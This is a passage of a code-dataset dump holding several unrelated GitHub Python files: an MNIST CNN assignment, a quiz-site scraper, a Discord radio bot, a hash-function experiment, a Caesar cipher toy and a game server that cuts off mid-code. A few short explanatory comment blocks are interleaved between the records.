set?\n# \n# \n# The MNIST dataset contains grayscale images of handwritten numbers from zero to nine. \n# \t\tWhen they are imported with fetch_openml, an array of shape (images, 784) is retrieved. \n# \t\t784 is the flattened form of the image and the input values are pixel values ranging from 0 – 255. \n# \t\tBecause it has only one color channel, it means that the dataset is grayscale.\n# \n# \n# * What does the line ```X = X.reshape(X.shape[0], 28, 28, 1)``` do?\n# \n# This operation reshapes the flattened array into a new array of shape (images, height, width, colour_channel)\n# \n# \n# Look at how the encoding of the targets (i.e. ```y```) is changed. E.g. the lines\n# ```\n# y_oh = np.zeros((num_tot, num_classes))\n# y_oh[range(num_tot), y] = 1\n# ```\n# Print out a few rows of ```y``` next to ```y_oh```.\n# * What is the relationship between ```y``` and ```y_oh```?\n# \n# \n# \"y\" holds the supervised labels that tell you which output class each input belongs to.\n# \"y\" ranges from 0 to 9 while y_oh is its one-hot encoding.\n# \n# \n# \n# * What is the type of encoding in ```y_oh``` called and why is it used?\n# \n# \n# y_oh is the one-hot encoding and it is used for classification problems.\n# Since deep learning models are based on math and numbers, \n# the output of a classification must be a numerical value and not a string. \n# Therefore a multiclass problem should use a one-hot encoding \n# so that the output of the neural network can be numerically compared with the target.\n# \n# Ex: A NN with three classes (\"dog,cat,human\") should have 3 columns: one for dog, one for cat and another for human.\n# a dog picture would have the one-hot encoding (1, 0, 0) because it belongs to one class, \n# a cat picture would have the one-hot encoding (0, 1, 0) and a human would have (0, 0, 1)\n# \n# \n# \n# * Plot three data examples in the same figure and set the correct label as title. \n# * It should be possible to see what the data represent.\n\n# %%\n# ### Question 2\n# **The model**\n# \n# Below is some code for building and training a model with Keras.\n# * What type of network is implemented below? I.e. a normal MLP, RNN, CNN, Logistic Regression...?\n# The type of the network used is a CNN (Convolutional Neural Network) \n# * What does ```Dropout()``` do?\n# \"Dropout randomly disconnects neuron connections to make the CNN generalize better, \n# and thus reducing the probability of overfitting\" \n# * Which type of activation function is used for the hidden layers?\n# Rectified Linear Unit (ReLU) \n# * Which type of activation function is used for the output layer?\n# Softmax \n# * Why are two different activation functions used?\n# ReLU is used to solve the vanishing gradient problem \n#\t\t\t\t\t\t\t and it reduces the influence of negative values after a convolution,\n# while softmax is used to transform the output layer values\n# into class probabilities \n# * What optimizer is used in the model below?\n# Although the name of the function is SGD (Stochastic Gradient Descent)\n# \t\t\t\t\t\tthe model uses mini-batch gradient descent \n# * How often are the weights updated (i.e. after how many data examples)?\n# The epochs and batches define when the weights are updated. \n# \t\t\t\t\t\t\tSince this specific model is using mini-batch gradient descent,\n# \t\t\t\t\t\t\tthe model will update its weights after completing a batch.\n# \t\t\t\t\t\t\tA dataset with 800 images and a batch size of 32 \n# \t\t\t\t\t\t\twill have 25 weight updates per epoch. \n# * What loss function is used?\n# \n# Categorical crossentropy \n# \n# \n# * How many parameters (i.e. weights and biases, NOT hyper-parameters) does the model have?\n# \n# <*answer here*> \n# \n#from IPython import embed; embed()\n\n# %%\n# ### Question 3\n# \n# * **Visualize the training**. Use the model above to observe the training process. Train it for 150 epochs and then plot both \"loss\" and \"val_loss\" (i.e. loss on the validation set; here the terms \"validation set\" and \"test set\" are used interchangeably, but this is not always true). What is the optimal number of epochs for minimizing the test set loss? \n# * Remember to first reset the weights (```model.reset_states()```), otherwise the training just continues from where it was stopped earlier.\n# \n# * **Optimizer**. Select three different optimizers and for each find the close-to-optimal hyper-parameter(s). In your answer, include a) your three choices, b) best hyper-parameters for each of the three optimizers and, c) the code that produced the results.\n# * NOTE that how long the training takes varies with optimizer. I.e., make sure that the model is trained for long enough to reach optimal performance.\n# \n# * **Dropout**. Use the best optimizer and do a hyper-parameter search to find the best value for ```Dropout()```.\n# \n# * **Best model**. Combine what you learned from the above three questions to build the best model. How much better is it than the worst and average models?\n# \n# <*answer here*> \n# \n# \n# * **Results on the test set**. When doing this search for good model configuration/hyper-parameter values, the data set was split into *two* parts: a training set and a test set (the term \"validation\" was used interchangeably with \"test\"). For your final model, is the performance (i.e. accuracy) on the test set representative of the performance one would expect on a previously unseen data set (drawn from the same distribution)? Why?\n# \n# <*answer here*> \n# \n# \n# ## Further information\n# For ideas about hyper-parameter tuning, take a look at the strategies described in the sklearn documentation under [model selection](https://scikit-learn.org/stable/model_selection.html), or in this [blog post](https://blog.tensorflow.org/2020/01/hyperparameter-tuning-with-keras-tuner.html) from TensorFlow. For a more thorough discussion about optimizers see [this video](https://www.youtube.com/watch?v=DiNzQP7kK-s) discussing the article [Descending through a Crowded Valley -- Benchmarking Deep Learning Optimizers](https://arxiv.org/abs/2007.01547).\n# \n# \n# **Good luck!**\n\n\n# %%\n","repo_name":"ricardoluhms/cnn_mnist_gen_alg","sub_path":"tutorial_mmai_assignment_3_v2.py","file_name":"tutorial_mmai_assignment_3_v2.py","file_ext":"py","file_size_in_byte":26398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
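# The Genetic_Algorithm in the record above evolves 6-gene policies (indices into the
# lr, decay, batch-size, epoch, dropout and optimizer lists), and its crossover swaps
# the genes at fixed positions [0, 2, 4] between two parents. The operator in isolation
# (a hypothetical standalone helper with the same gene layout):

def crossover(policy1, policy2, genes_pos=(0, 2, 4)):
    child1, child2 = list(policy1), list(policy2)
    for g in genes_pos:
        # each child takes the other parent's gene at the swap positions
        child1[g], child2[g] = policy2[g], policy1[g]
    return child1, child2

p1 = [0, 0, 0, 0, 0, 0]
p2 = [1, 1, 1, 1, 1, 1]
print(crossover(p1, p2))
# -> ([1, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1])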
+{"seq_id":"30911974194","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom achihuo_mini.async_loop import AsyncLoop\nfrom achihuo_mini.item import Item\nfrom vko_spider.mini_spider.vko_mini_spider import VkoMiniSpider\n\nHEADERS = {\n'Accept-Encoding': 'gzip, deflate',\n'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4',\n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36',\n'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n'Accept': '*/*',\n'X-Requested-With': 'XMLHttpRequest',\n'Connection': 'keep-alive',\n'Referer': 'http://tiku.vko.cn/',\n}\n\nURL = 'http://tiku.vko.cn/resolve/{}'\n\nclass VkoMiniSpider(AsyncLoop):\n\n NAME = 'vko_mini_spider'\n\n def __init__(self):\n super(VkoMiniSpider, self).__init__(concurrency=30, cache_backend='ssdb')\n\n\ndef make_item(qid):\n url = URL.format(qid)\n item = Item(dict(\n method = 'GET',\n url = url,\n max_retry = 2,\n timeout = 60,\n ))\n return item\n\n\ndef request(qid):\n url = URL.format(qid)\n resp = requests.get(url, headers=HEADERS)\n return resp.text\n\n\ndef find_max_qid():\n min_qid = 1\n max_qid = 1000000\n\n def binary_search(mnq, mxq):\n if mxq - mnq <= 1:\n return mxq\n\n mid = (mxq + mnq) // 2\n print(mid)\n html = request(mid)\n if not html.startswith('null('):\n return binary_search(mnq, mid)\n else:\n return binary_search(mid, mxq)\n\n return binary_search(min_qid, max_qid)\n\n\ndef main():\n loop = VkoMiniSpider()\n\n max_qid = find_max_qid()\n for qid in range(1, max_qid):\n item = make_item(qid)\n loop.add_task('get_question', item, task_name=item.url, repeat=False)\n\n\ndef test():\n max_qid = find_max_qid()\n print('max_qid', max_qid)\n\n\nif __name__ == '__main__':\n main()\n # test()\n","repo_name":"waryhao/Afanti_tiku","sub_path":"vko_spider/mini_spider/vko_add_next_qids.py","file_name":"vko_add_next_qids.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13404711758","text":"import json\nimport array\nimport struct\nimport audioop\nimport discord\nimport asyncio\nimport requests\nimport threading\nfrom io import BufferedIOBase, BytesIO\nfrom queue import Queue, Empty as EmptyQueue\nfrom typing import *\nfrom subprocess import Popen, PIPE\nfrom functools import partial\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import CommandError\n\n\nclass OggVorbisStream:\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.page_iter = self.page_generator(file_handle)\n\n def page_generator(self, file_handle: BufferedIOBase):\n while file_handle.read(4) == b\"OggS\":\n yield OggPage(file_handle)\n\n def get_next_page(self):\n try:\n return next(self.page_iter)\n except StopIteration:\n return None\n\n\nclass OggPage:\n\n ogg_page_struct = struct.Struct(\"=BBQIIIB\")\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table = self.ogg_page_struct.unpack(\n file_handle.read(self.ogg_page_struct.size))\n\n self.seg_table = array.array('B', struct.unpack(\n 'B'*self.len_seg_table, file_handle.read(self.len_seg_table)))\n\n self.data = file_handle.read(sum(self.seg_table))\n\n def convert_to_bytes(self):\n return b\"OggS\" + self.ogg_page_struct.pack(self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table) + self.seg_table.tobytes() + self.data\n\n\nclass RadioPlayer(discord.AudioSource):\n \"\"\"The radio player class\"\"\"\n\n def __init__(self, radio_code_name: str, radio_name: str, radio_url: str, radio_format: str, discord_ctx: commands.Context):\n self.radio_code_name = radio_code_name\n self.radio_name = radio_name\n self.radio_url = radio_url\n self.radio_format = radio_format\n\n self.discord_ctx = discord_ctx\n self.event_loop: asyncio.AbstractEventLoop = discord_ctx.bot.loop\n self.last_now_playing_message: discord.Message = None\n\n self._volume = 0.07\n self.audio_queue = Queue()\n\n if self.radio_format == \"direct\":\n ffmpeg_command_line = \"ffmpeg -i {url} -f s16le -ac 2 -ar 48000 pipe:1\".format(\n url=radio_url).split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdout=PIPE, creationflags=0x08000000)\n else:\n ffmpeg_command_line = \"ffmpeg -i pipe:0 -f s16le -ac 2 -ar 48000 pipe:1\".split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdin=PIPE, stdout=PIPE, creationflags=0x08000000)\n # the creationflags part is only if this is running in Windows\n\n # Threading!\n stdin_thread = threading.Thread(\n target=self.stdin_blaster, daemon=True)\n stdin_thread.start()\n stdout_thread = threading.Thread(target=self.drain_stdout, daemon=True)\n stdout_thread.start()\n\n self.setup_auto_disconnect()\n\n def drain_stdout(self):\n stdout: IO = self.ffmpeg_process.stdout\n while True:\n data = stdout.read(3840)\n if not data:\n break\n try:\n self.audio_queue.put(data)\n except AttributeError:\n return\n\n def stdin_blaster(self):\n stdin: IO = self.ffmpeg_process.stdin\n if self.radio_format != \"vorbis\":\n headers = {\"Icy-MetaData\": \"1\"}\n with requests.get(self.radio_url, headers=headers, stream=True) as response:\n response.raise_for_status()\n\n metaint: int = int(response.headers.get(\"icy-metaint\"))\n try:\n data = response.raw.read(metaint)\n while True:\n stdin.write(data)\n\n metadata_block_size = int.from_bytes(\n response.raw.read(1), byteorder=\"little\")\n if metadata_block_size != 0:\n metadata_bytes: bytes = 
response.raw.read(\n metadata_block_size * 16)\n self.event_loop.create_task(\n self.tell_text_channel_currently_playing(metadata_bytes.decode(\"utf-8\")))\n\n data = response.raw.read(metaint)\n except OSError:\n # ffmpeg closed\n return\n else:\n with requests.get(self.radio_url, stream=True) as response:\n response.raise_for_status()\n\n ogg_stream = OggVorbisStream(response.raw)\n\n page = ogg_stream.get_next_page()\n\n while page:\n if page.data[:7] == b\"\\x03vorbis\":\n metadata = dict()\n\n data_io = BytesIO(page.data)\n\n data_io.read(7)\n\n data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False))\n\n for _ in range(int.from_bytes(data_io.read(4), \"little\", signed=False)):\n separated_metadata = data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False)).decode().split('=')\n metadata[separated_metadata[0].lower()] = \"=\".join(\n separated_metadata[1:])\n\n del data_io\n\n self.event_loop.create_task(self.tell_np_vorbis(metadata))\n\n del metadata\n\n try:\n stdin.write(page.convert_to_bytes())\n except OSError:\n return\n\n page = ogg_stream.get_next_page()\n\n async def tell_np_vorbis(self, metadata: Dict):\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {metadata['artist']} - {metadata['title']} from {self.radio_name}\")\n\n @property\n def volume(self):\n return self._volume\n\n @volume.setter\n def volume(self, value: float):\n self._volume = min(1.0, value)\n\n def get_current_song_title(self, metadata_string: str):\n \"\"\"Temp func until able to tell what is playing in the text channel\"\"\"\n metadatas = metadata_string.split(\";\")\n for metadata_line in metadatas:\n metadata_line_pair = metadata_line.split(\"=\")\n if metadata_line_pair[0] == \"StreamTitle\":\n # print(\"Currently playing {song_name} in {server_name}\".format(\n # song_name=metadata_line_pair[1].strip(\"'\"), server_name=self.discord_ctx.guild))\n # break\n return metadata_line_pair[1].strip(\"'\")\n\n async def tell_text_channel_currently_playing(self, metadata: str):\n song_name = await self.event_loop.run_in_executor(None, partial(self.get_current_song_title, metadata))\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {song_name} from {self.radio_name}\")\n\n def setup_auto_disconnect(self):\n @tasks.loop(minutes=5, loop=self.event_loop)\n async def auto_disconnect():\n voice_client: discord.VoiceClient = self.discord_ctx.voice_client\n members: List[discord.Member] = voice_client.channel.members\n if len([member for member in members if not member.bot]) == 0:\n await self.discord_ctx.send(\"Disconnecting due to there is nobody in the VC\")\n voice_client.stop()\n await voice_client.disconnect()\n\n auto_disconnect.start()\n self.auto_disconnect: tasks.Loop = auto_disconnect\n\n def read(self):\n try:\n return audioop.mul(self.audio_queue.get(timeout=15), 2, self._volume)\n except EmptyQueue:\n return b''\n\n def cleanup(self):\n self.auto_disconnect.cancel()\n self.ffmpeg_process.terminate()\n\n del self.auto_disconnect\n del self.audio_queue\n del self.ffmpeg_process\n del self.last_now_playing_message\n\n del self.radio_code_name\n del self.radio_format\n del self.radio_name\n del self.radio_url\n\n\nclass Radio(commands.Cog):\n \"\"\"Radio Cog Class\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n 
@commands.Cog.listener()\n async def on_ready(self):\n print(\"Radio Cog is loaded.\")\n\n @commands.command()\n async def radio(self, ctx: commands.Context, radio_code_name: str):\n \"\"\"Command to play a radio\"\"\"\n\n radio_data = await self.bot.loop.run_in_executor(None, partial(Radio.get_radio, radio_code_name))\n\n # There are always 3 element in radio_data, [0] is the url\n # [1] is the format and [2] is the radio name\n\n if not radio_data:\n return await ctx.send(f\"There is no such thing as {radio_code_name}\")\n\n player = await self.bot.loop.run_in_executor(None, partial(RadioPlayer, radio_code_name, radio_data[2], radio_data[0], radio_data[1], ctx))\n\n ctx.voice_client.play(player)\n\n @commands.command()\n async def stop_radio(self, ctx: commands.Context):\n voice_client: discord.VoiceClient = ctx.voice_client\n if voice_client.is_playing():\n voice_client.stop()\n await ctx.send(\"Stopped radio!\")\n\n @commands.command()\n async def radio_volume(self, ctx: commands.Context, volume: int):\n try:\n voice_client: discord.VoiceClient = ctx.voice_client\n voice_client.source.volume = float(volume / 100)\n except AttributeError as e:\n await ctx.send(\"Failed to change volume\")\n raise e\n await ctx.send(f\"Changed volume to {volume}\")\n\n @radio.before_invoke\n async def radio_before_invoke(self, ctx: commands.Context):\n if ctx.voice_client is None:\n if ctx.author.voice:\n await ctx.author.voice.channel.connect()\n print(\n f\"Connected to the {ctx.author}'s voice channel on {ctx.guild} server!\")\n else:\n await ctx.send(\"Please join a VC first!\")\n raise CommandError(\n f\"{ctx.author} tried to summon bot while being outside of VC.\")\n\n # This part is to check if it need to stop the current player\n # or not by checking either if it the user is asking to listen to\n # currently playing radio station or if it is not radio player at all\n elif ctx.voice_client.is_playing():\n if ctx.voice_client.source is RadioPlayer:\n radio_player: RadioPlayer = ctx.voice_client.source\n # check if currently playing station is the same\n # as the one being asked to tuned into\n # ctx.args[2] is the radio_name argument of the radio command\n if radio_player.radio_code_name == ctx.args[2]:\n await ctx.send(f\"Already tuned to {ctx.args[2]}!\")\n raise CommandError(\n f\"User {ctx.author} tried to tune into the currently tuned radio station.\")\n # if we reached here, it means that the source is either some type of other source/player\n # or its a different station, either way, we just stop them\n ctx.voice_client.stop()\n\n @commands.command(aliases=[\"radios\"])\n async def list_all_radio(self, ctx: commands.Context):\n line_format = \"{radio_name} -> {radio_code}\\n\"\n formatted_str = \"\"\n\n radios: Dict = await self.bot.loop.run_in_executor(None, Radio.get_radios)\n\n radio_code: str\n radio_data: List[str]\n for radio_code, radio_data in radios.items():\n formatted_str += line_format.format(\n radio_name=radio_data[2], radio_code=radio_code)\n\n await ctx.send(\n \"```\\n\" +\n formatted_str +\n \"```\"\n )\n\n @staticmethod\n def get_radio(radio_name: str) -> Union[Dict, bool]:\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n try:\n return radios[radio_name]\n except:\n return False\n\n @staticmethod\n def get_radios():\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n return radios\n\n\ndef setup(bot: commands.Bot):\n 
bot.add_cog(Radio(bot))\n","repo_name":"Naz1337/discord-naz-bot","sub_path":"cogs/radio.py","file_name":"radio.py","file_ext":"py","file_size_in_byte":12703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
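# get_current_song_title in the record above parses Shoutcast/Icecast in-stream ("ICY")
# metadata, which arrives as "key='value';" pairs every icy-metaint bytes. A minimal
# standalone parse of one such block (sample string; a real stream pads the block with
# NUL bytes, stripped here):

def icy_stream_title(metadata):
    for pair in metadata.rstrip("\x00").split(";"):
        key, _, value = pair.partition("=")
        if key == "StreamTitle":
            return value.strip("'")
    return None

print(icy_stream_title("StreamTitle='Daft Punk - Around the World';StreamUrl='';"))
# -> Daft Punk - Around the World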
+{"seq_id":"32830439153","text":"from enum import Enum\nfrom Core import Node\n\n\nclass TypeOfComp(Enum):\n Res = \"Resistance\"\n Node = \"Node\"\n IndVolt = \"Independent voltage\"\n IndCur = \"Independent Current\"\n\nclass Component():\n def __init__(self, type: TypeOfComp):\n self.__voltage: int = 0\n self.__charge: int = 0\n self.__type = type\n\n @property\n def Type(self):\n return self.__type\n\ndef checkExistanceOfNode(nodeNumber, nodes: dict):\n if nodeNumber in nodes:\n node = nodes[nodeNumber]\n else:\n node = Node.Node(nodeNumber)\n nodes[nodeNumber] = node\n return node\n","repo_name":"daniyalmaroufi/circuit-solver","sub_path":"Core/Component.py","file_name":"Component.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"12274694047","text":"import glob\nimport imp\nimport os.path\n\n\nclass Plugin(object):\n \"\"\"Base class for all plugins.\"\"\"\n\n capability = []\n\n @classmethod\n def is_capable(cls, requested_capability):\n \"\"\"Returns true if the requested capability is supported by this plugin\n \"\"\"\n for c in requested_capability:\n if c not in cls.capability:\n return False\n return True\n\n\ndef get_plugin(cls, requested_capability=None):\n if not requested_capability:\n requested_capability = []\n result = []\n for handler in cls.__subclasses__():\n if handler.is_capable(requested_capability):\n result.append(handler)\n return result\n\n\ndef _import_module(filename):\n (path, name) = os.path.split(filename)\n (name, ext) = os.path.splitext(name)\n\n (file, filename, data) = imp.find_module(name, [path])\n try:\n return imp.load_module(name, file, filename, data)\n finally:\n if file:\n file.close()\n\n_plugin_loaded = False\n\n\ndef load_plugins(config):\n global _plugin_loaded\n if _plugin_loaded:\n return\n _plugin_loaded = True\n\n if not config.has_option('Plugin', 'plugin_directory'):\n return\n directory = config.get('Plugin', 'plugin_directory')\n for file in glob.glob(os.path.join(directory, '*.py')):\n _import_module(file)\n","repo_name":"silveregg/txboto","sub_path":"txboto/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"34962323512","text":"import string\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef process_word(w):\n w = w.rstrip()\n w2 = [char for char in w if char in string.ascii_letters]\n return \"\".join(w2).upper()\n\nraw_words = random.sample(open(\"/usr/share/dict/words\", \"rt\").readlines(), 100)\nwords = [pw for pw in [process_word(w) for w in raw_words] if pw]\n\n\ndef create_labelname(idx):\n w1 = random.choice(words)\n w2 = \"\" # random.choice(words)\n name = (w1+w2)[:25].upper()\n return name + \".\" + str(idx) + random.choice(string.ascii_uppercase+string.digits)\n\n\nnumber_of_labels = 5000\nlabels = [create_labelname(idx) for idx in range(number_of_labels)]\n\n\ndef hashfunc1(label):\n length = len(label) # assume we know the length of the symbol already\n c0 = ord(label[0])\n c1 = ord(label[1])\n clast = ord(label[length-1])\n return ((c0 + clast + c1*4) ^ (length*4)) & 127\n\n\ndef hashfunc2(label):\n # just sum up all the characters of the label....\n # could be faster / better if you have to scan it anyway to determine the length\n # also seems to work better for shorter labels\n length=len(label)\n return (sum([ord(c) for c in label]) ^ (length*2)) & 127\n\ndef hashfunc3(label):\n # this is the string.hash function in the prog8 string library\n hashcode = 179\n carry = 0\n for c in label:\n newcarry = 1 if hashcode&128 else 0\n hashcode = (hashcode << 1) & 255 | carry\n carry = newcarry\n hashcode ^= ord(c)\n return hashcode\n\n\nif __name__==\"__main__\":\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc1(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n p=sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc2(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 256\n for lbl in labels:\n hashvalue = hashfunc3(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n","repo_name":"irmen/cx16assem","sub_path":"experiment/hashed_syms/hashfunctionstest.py","file_name":"hashfunctionstest.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"29418139191","text":"import os\r\n\r\n\r\nos.system('cls')\r\n\r\n\r\n\r\nprint('''\r\n ##################################################\r\n # #\r\n # caesar_encode by : Welson #\r\n # #\r\n ##################################################\r\n\r\n''')\r\n\r\n\r\ndef encode():\r\n print('Starting encode')\r\n print('输入你想要输入的明文' )\r\n txt = input(\">>\")\r\n print('请输入移动位数')\r\n offset = int(input(\">>\"))\r\n\r\n\r\n #考虑用户用的是字符串\r\n result = \"\"\r\n\r\n for t in txt:\r\n n = ord(t)\r\n n = n + offset\r\n t2 = chr(n)\r\n result = result + t2\r\n \r\n print(f'加密后的字符是 {result}')\r\n\r\ndef decode():\r\n print('Starting decode')\r\n print('输入你要解密的密文' )\r\n cipher = input('>>')\r\n print(\"请输入秘钥.\")\r\n key = int(input('>'))\r\n \r\n plain = \"\"\r\n\r\n \r\n for c in cipher:\r\n n = ord(c)\r\n n = n - key\r\n p = chr(n)\r\n plain += p\r\n\r\n print(f'解密后的明文是:{plain}')\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\nrunning = True\r\nwhile running:\r\n print('1.Encode 2.decode 3.Exit')\r\n sel = input(\">>\")\r\n if sel == '1':\r\n encode()\r\n elif sel == '2':\r\n decode()\r\n elif sel == '3':\r\n print(\"Thank you for use this app!\")\r\n running = False\r\n else:\r\n print('请做出正确的选择。 ')\r\n \r\n \r\n","repo_name":"Welsonpeaches/caeser_encode","sub_path":"caesar_encode_decode.py","file_name":"caesar_encode_decode.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13117134710","text":"import argparse\nfrom distutils.dir_util import copy_tree\n\nparser = argparse.ArgumentParser(\n description='Copy files form one folder to another',\n prog='copy_script'\n)\ndef main():\n parser.add_argument(\n '-s', \n '--source-dir', \n default=\".\",\n help=\"Source directory from where files should be copied\"\n )\n parser.add_argument(\n '-d', \n '--destination-dir', \n default=\".\", \n help=\"Source directory from where files should be copied\"\n )\n args = parser.parse_args()\n if args.source_dir == \".\" and args.destination_dir == \".\" :\n parser.print_help()\n else:\n copy_tree(args.source_dir,args.destination_dir)\n print(f\"Copied files from {args.source_dir} to {args.destination_dir}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"HubGab-Git/copy_script","sub_path":"python/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70454123610","text":"#server\r\n\r\nimport sys\r\nimport player\r\nimport threading\r\nimport traceback\r\nfrom socket import *\r\nimport gameserver as gs\r\nfrom random import randint\r\nimport securedsocket as ss\r\nimport configurationmanager as cm\r\n\r\nPORT = randint(0,5000) \t\t# starts from a random port\r\n\r\n\r\ndef get_new_socket(player_socket):\r\n\tglobal PORT\r\n\tPORT += 1\r\n\tport_min = cm.tcp_server_min_port\r\n\tport_max = cm.tcp_server_max_port\r\n\ttcp_port = (port_min + PORT) % port_max\r\n\r\n\ttemp_socket = socket(AF_INET, SOCK_STREAM)\r\n\ttemp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\r\n\ttry:\r\n\t\tplayer_socket.send(str(tcp_port))\r\n\t\ttemp_socket.bind(('', tcp_port))\r\n\t\ttemp_socket.listen(15)\r\n\t\tnew_player_socket,address = temp_socket.accept()\r\n\texcept socket.timeout:\r\n\t\tprint(\"Socket timeout. Port may have been used recently. wait and try again!\")\r\n\t\treturn None,tcp_port\r\n\texcept:\r\n\t\tprint(\"Socket error. Try again\")\r\n\t\treturn None,tcp_port\r\n\tfinally:\r\n\t\ttemp_socket.close()\r\n\treturn ss.RSASocket(new_player_socket),address\r\n\r\n\r\n# creates a server side player_object\r\ndef prepare_player(player_socket,game_server):\r\n\tname = player_socket.recv(1024)\r\n\tnew_player_socket = None\r\n\twhile not new_player_socket:\r\n\t\tnew_player_socket,new_address = get_new_socket(player_socket)\r\n\r\n\tudp_sending = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_sending[1:-1].split(\",\")\r\n\tudp_address_sending = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tudp_receiving = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_receiving[1:-1].split(\",\")\r\n\tudp_address_receiving = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tp = player.Player(name,new_player_socket,new_address,udp_address_sending,udp_address_receiving)\r\n\r\n\tgame_server.add_player(p)\r\n\tplayer_socket.close()\r\n\r\n# to use the UDP socket\r\ndef ping_response():\r\n\tping_socket = socket(AF_INET, SOCK_DGRAM)\r\n\tping_socket.bind(('', cm.udp_ping_port)) # for pinging\r\n\twhile not server_quitting:\r\n\t\tmsg,address = ping_socket.recvfrom(1024)\r\n\t\tif (msg.decode() == \"OPEN\"):\r\n\t\t\tping_socket.sendto(msg,address)\r\n\tping_socket.close()\r\n\r\n\r\n# \r\ndef main():\r\n\tglobal server_quitting \t\t\t\t\t\t\t\t# for the future\r\n\tthreads = []\r\n\tgame_server = None\r\n\r\n\ttry:\r\n\t\tserver_quitting = False\r\n\r\n\t\t# this is to verify if the server is up (UPD)\r\n\t\tt = threading.Thread(target=ping_response)\r\n\t\tt.start()\r\n\t\tthreads.append(t)\r\n\r\n\t\tmaximum_connected = cm.maximum_connected\r\n\t\tserver_socket = socket(AF_INET,SOCK_STREAM)\r\n\t\tserver_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\t\tserver_socket.bind(('',cm.tcp_server_port)) \t\t\t\t# game socket\r\n\t\tserver_socket.listen(maximum_connected)\r\n\r\n\t\tchat_socket = socket(AF_INET, SOCK_DGRAM)\r\n\t\tchat_socket.bind(('', cm.udp_server_port))\t\t\t\t\t# chat room socket\r\n\t\tchat_socket = ss.RSASocket(chat_socket)\r\n\r\n\t\t# create the game server\r\n\t\tgame_server = gs.TheGameServer(maximum_connected,chat_socket)\r\n\t\t\r\n\t\t# entry door for incoming players\r\n\t\twhile not server_quitting:\r\n\t\t\tplayersocket, addr = server_socket.accept()\r\n\t\t\tif (not server_quitting):\r\n\t\t\t\tss_socket = ss.RSASocket(playersocket)\r\n\t\t\t\tt = 
